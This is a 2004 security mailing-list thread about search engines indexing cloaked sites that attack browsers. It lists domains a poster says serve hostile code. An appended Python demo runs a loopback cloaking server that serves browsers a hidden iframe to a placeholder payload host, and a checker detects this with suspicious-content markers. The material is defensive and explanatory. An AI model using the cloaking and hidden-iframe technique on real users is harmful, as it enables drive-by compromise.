[Intrusions] Google security concern?
Empty Floatbag
float_bag at yahoo.com
Tue Dec 28 20:27:58 GMT 2004
All,
Thanks for the responses. I entirely understand that
this is an illegitimate use of a legitimate service
provided by Google. For note, I am seeing a similar
issue on AltaVista and Yahoo - and Google did seem to
remove/blacklist a handful of the sites I sent them
last Thursday. Essentially, what I think is that
these sites are performing some sort of "cloaking" or
other stealth behavior to mask the true content of
their site - which is a malicious payload (I am using
RealSecure IDS, NetIntercept and other tools to
determine the returning streams from these servers).
The search-bots are not picking up on the fact that
these servers have no "real" content. I am guessing
that they are using some sort of scripting to generate
thousands of fake pages with fake content on dozens of
hostile servers. What content I have seen is very
similar to the SPAM language, where it is randomly
coherent, yet still gibberish - as well as what looks
to be common search phrases/terms, with mis-spellings
included (the worst ones).
My prediction: the first person who can design a
better search-bot that can distinguish fake/malicious
content from real content will make millions (if that
can even be done)...
Just a sampling of the sites that are returning
hostile code...
oeteg.com
wowsukhumvit.com
www.itnews21.ru
tekona.ru
travelfund.ru
phinest.ru
iyeinteractive.com
notebook-smolensk.ru
elitmail.ru
freedommusic.ru
ballballoon.ru
styletour.ru
clubtornado.ru
anapasurfing.ru
nomacon-trade.ru
kronex.ru
www.moscowberlin.ru
www.kbe-personal.ru
www.a-1trailer.com
www.pvr-rpg.ru
sad-ajg.ru
www.lariadna.ru
www.rufiko.ru
www.altezo.ru
www.panaceamed.ru
www.solarmusic.ru
www.bummy.ru
travel.in.asia.1se.ru
Regards,
PM
--- James C Slora Jr <Jim.Slora at phra.com> wrote:
> Empty Floatbag wrote Monday, December 27, 2004 13:52
>
> > Has anyone else noticed that some seemingly "normal" searches on Google
> > return completely unrelated sites which attempt to compromise a system
> > through the browser?
>
> It's an old game, and is very common. Every search engine has its scoring
> criteria - advertisers learn what works for each engine, and they do
> whatever it takes to bring their clients' sites to the top. What works for
> legitimate advertisers works for the adware and malware people, too.
>
> I always caution people to do a reality check on any search engine hits,
> rather than trusting the links. Search results are barely safer than links
> in unsolicited email.
>
> Search engines can't recognize every piece of potentially hostile code on
> pages they index, even if this were part of their mission. Plus once a page
> is indexed, search engines cannot prevent the site's contents from changing
> to hostile code. Google and other search engines do try to keep the junk out
> of their results, but they have a never-ending challenge in doing this.
> Every search method has its strengths and weaknesses, so similar problems
> will always be with us to some extent.
>
> You asked about caching. I believe that any page can control whether or not
> it is cached in Google - a lot of pages seem to prevent caching in order to
> make sure users get fresh content. Again, what works for legitimate purposes
> can also be abused.
>
> The problem you reported is one of my most common incident generators. Users
> do a search and click on whatever they find, thinking it must be safe and
> relevant. They are conditioned against popups and spam, but too often have
> blind trust in search results.
>
> Top enemies for us:
> 1. Hostile ads on legitimate ad servers
> 2. Legitimate sites with additional hostile intent (adware on sites that
>    draw users)
> 3. Gamed search engine hits
> 4. Legitimate sites that have been hacked
> 5. Email with hostile links
>
> These few things cover pretty much all the non-viral, non-network malware we
> encounter. We see a lot of overlap between these categories. The most common
> payload is a download trojan that usually installs adware. Sometimes there
> are attempts to install botnets and other kinds of trojans. These vehicles
> have a much higher infection success rate against us than worms, skiddies,
> and botnet attacks - because they spread through end user content that we
> allow into our network by design. We do many things to mitigate these
> threats, but none is 100% effective.
>
> Search engine hits are an obvious enabler for most of the other types of
> threats on our list. I venture to guess that click rates on gamed search
> results are thousands of times better than click rates on spam.
>
> This stuff is pretty mainstream - presumably because it generates revenue.
> Over the past year, I've found several adware packages promoting what would
> normally be considered legitimate businesses. It's hard to know whether
> these businesses knew that they were buying into the hostile software
> market, or if they thought they were just buying legitimate advertising.
>
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
>
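The "cloaking" behaviour PM describes (keyword-stuffed pages shown to the
search-bot, a hostile payload shown to the browser) and the caching point Jim
raises (a page can ask Google not to archive it, so the cached copy cannot be
used to inspect what the crawler saw) can both be demonstrated with one small
script. This is an added example, not code from either poster: it runs a
hypothetical cloaking server on loopback that keys on the User-Agent header,
then fetches the same URL once as a crawler and once as a browser and reports
whether the two responses differ. The crawler strings, the two page bodies
and the "suspicious" markers are all constructed for the example.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, ProxyHandler, build_opener

# Constructed sample content (not from any real host): keyword soup with a
# noarchive hint for crawlers, a hidden iframe to a payload host for browsers.
BOT_PAGE = (b'<html><head><meta name="robots" content="noarchive"></head>'
            b'<body>cheap notebook smolensk travel fund surfing club tornado'
            b'</body></html>')
BROWSER_PAGE = (b'<html><body><iframe src="http://payload.invalid/x.chm" '
                b'width=0 height=0></iframe></body></html>')

# Substrings identifying the Google, Yahoo and AltaVista crawlers of the time.
CRAWLER_MARKERS = ("googlebot", "slurp", "scooter")


class CloakingHandler(BaseHTTPRequestHandler):
    """Hypothetical cloaking server: decides what to serve purely by User-Agent."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "").lower()
        body = BOT_PAGE if any(m in ua for m in CRAWLER_MARKERS) else BROWSER_PAGE
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind the cloaking server to an ephemeral loopback port and serve in a thread."""
    srv = HTTPServer(("127.0.0.1", 0), CloakingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(url, user_agent):
    """GET url with a chosen User-Agent, ignoring any proxy environment variables."""
    opener = build_opener(ProxyHandler({}))
    req = Request(url, headers={"User-Agent": user_agent})
    with opener.open(req, timeout=5) as resp:
        return resp.read()


# Markers a browser-facing page should not need; constructed for the example.
SUSPICIOUS = (b"<iframe", b"<script", b"<object", b".exe", b".chm")


def check_cloaking(url):
    """Fetch url as a crawler and as a browser; report divergence and payload hints."""
    as_bot = fetch(url, "Googlebot/2.1 (+http://www.google.com/bot.html)")
    as_user = fetch(url, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")
    return {
        "cloaked": as_bot != as_user,
        "bot_noarchive": b'content="noarchive"' in as_bot.lower(),
        "browser_markers": [m.decode() for m in SUSPICIOUS if m in as_user.lower()],
    }


if __name__ == "__main__":
    srv = start_server()
    target = "http://127.0.0.1:%d/" % srv.server_address[1]
    print(check_cloaking(target))
    srv.shutdown()
```

Against a real site the same two fetches are the first check worth making;
a byte-for-byte comparison is deliberately strict, so on pages with rotating
ads or timestamps you would compare the set of script/iframe/object sources
instead of the raw bodies. Note the limitation Jim points out: a host can
also serve one thing at index time and another thing later, which no
single-point-in-time comparison will catch.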